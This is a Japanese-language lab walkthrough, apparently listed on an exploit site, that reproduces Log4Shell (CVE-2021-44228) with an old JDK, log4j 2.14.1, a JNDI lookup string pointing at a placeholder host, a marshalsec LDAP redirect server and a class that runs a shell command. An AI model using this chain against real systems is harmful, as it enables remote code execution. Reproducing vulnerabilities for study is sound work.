Exploit for Deserialization of Untrusted Data in Apache Log4J CVE-2021-44228

Name: Exploit for Deserialization of Untrusted Data in Apache Log4J CVE-2021-44228
Rating: 5 (243 reviews)
2021-12-10 | CVSS 9.3
## https://sploitus.com/exploit?id=11719BED-E629-5C79-944E-7E40BBFC460C
# CVE-2021-44228  


> こっちのお話の方がより実用性があると思います(泣)[christophetd/log4shell-vulnerable-app](https://github.com/christophetd/log4shell-vulnerable-app)


興味を持って勢いで調べただけなので、あやふやな箇所や間違いがあると思われます。  
どうか、自己責任でお願いします。

## 再現環境を作る。  

linux環境であれば動作すると思われます。

### 1. jdk のダウンロード  
**jdk8u121** 以降では *com.sun.jndi.rmi.object.trustURLCodebase* オプションが追加され、デフォルトが False になっています。
この状態では外部で用意した class を読み込ませることができないので、今回はそれ以前のバージョンを利用します。  
(*内部のクラスを読み込ませたりバイパスしたりできる？？*)
https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/  
  
[jdk8u20の直接ダウンロード](http://api.vulhub.org/download/jdk/8/jdk-8u20-linux-x64.tar.gz)  
解凍して適当に /opt などに置いておきます。

### 2. 脆弱性のあるlog4jの用意  
[log4jのダウンロード](https://www.apache.org/dyn/closer.lua/logging/log4j/2.14.1/apache-log4j-2.14.1-bin.tar.gz)  
解凍して **log4j-api-2.14.1.jar** と **log4j-core-2.14.1.jar** を取り出します（今回は log4japp というディレクトリに入れました）。


### 3. log4j のクラスパスを通す

```bash
export CLASSPATH=:/path/to/log4japp/log4j-api-2.14.1.jar:/path/to/log4japp/log4j-core-2.14.1.jar
```

### 4. 簡単なアプリケーションを作成 
```java:log4j.java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class log4j {


        private static final Logger logger = LogManager.getLogger(log4j.class);

        public static void main(String[] args) {
                logger.error("${jndi:ldap://your-ip:1389/resource}");
                // /resource がないと動きませんでした。
        }
}
```

### 5. marshalsec の用意  
[mbechler/marshalsec](https://github.com/mbechler/marshalsec)  
ldap の問い合わせを Web の方にリダイレクトして、かつ実行させる感じ？？
```bash
mvn clean package -DskipTests
```
待受開始
```bash
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://your-web-ip:8888/#Exploit"
```
marshalsec のリダイレクト先も用意
```bash
python3 -m http.server 8888
```

### 6. marshalsec が実行させるクラスを用意  
```java:Exploit.java
class Exploit {
    static {
        try { Runtime.getRuntime().exec("touch /tmp/evil"); } catch(Exception e) {}
    }
}
```
インストールした jdk8u20 を使ってコンパイル
```bash
/opt/java/jdk1.8.0_20/bin/javac Exploit.java
```

### 7. exploit
インストールした jdk8u20 を使ってコンパイル・実行する。
```bash
/opt/java/jdk1.8.0_20/bin/javac log4j.java
/opt/java/jdk1.8.0_20/bin/java log4j
```

![screenshot](https://github.com/racoon-rac/CVE-2021-44228/blob/main/Screenshot.png)